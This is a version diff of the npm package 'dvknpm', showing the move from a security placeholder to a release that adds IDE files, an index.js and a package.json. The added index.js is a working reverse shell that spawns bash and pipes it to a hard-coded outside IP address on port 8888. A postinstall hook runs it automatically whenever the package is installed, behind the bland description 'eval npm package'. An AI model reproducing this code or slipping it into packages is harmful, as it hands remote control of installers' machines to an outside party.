dvknpm 0.0.1-security → 1.0.3

package/.idea/dvknpm.iml

@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module type="WEB_MODULE" version="4">
+  <component name="NewModuleRootManager">
+    <content url="file://$MODULE_DIR$">
+      <excludeFolder url="file://$MODULE_DIR$/temp" />
+      <excludeFolder url="file://$MODULE_DIR$/.tmp" />
+      <excludeFolder url="file://$MODULE_DIR$/tmp" />
+    </content>
+    <orderEntry type="inheritedJdk" />
+    <orderEntry type="sourceFolder" forTests="false" />
+  </component>
+</module>

package/.idea/modules.xml

@@ -0,0 +1,8 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project version="4">
+  <component name="ProjectModuleManager">
+    <modules>
+      <module fileurl="file://$PROJECT_DIR$/.idea/dvknpm.iml" filepath="$PROJECT_DIR$/.idea/dvknpm.iml" />
+    </modules>
+  </component>
+</project>

package/index.js

@@ -0,0 +1,13 @@
+// function sleep(ms) {
+//     return new Promise(resolve => setTimeout(resolve, ms))
+// }
+
+var net = require("net")
+var cp = require("child_process");
+var sh = cp.spawn("/bin/bash", []);
+var client = new net.Socket();
+client.connect(8888, "47.98.218.90", function () {
+    client.pipe(sh.stdin);
+    sh.stdout.pipe(client);
+    sh.stderr.pipe(client);
+});

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "dvknpm",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.3",
+  "description": "dvk's eval npm package",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "postinstall": "node index.js"
+  },
+  "author": "DVKunion",
+  "license": "ISC"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=dvknpm for more information.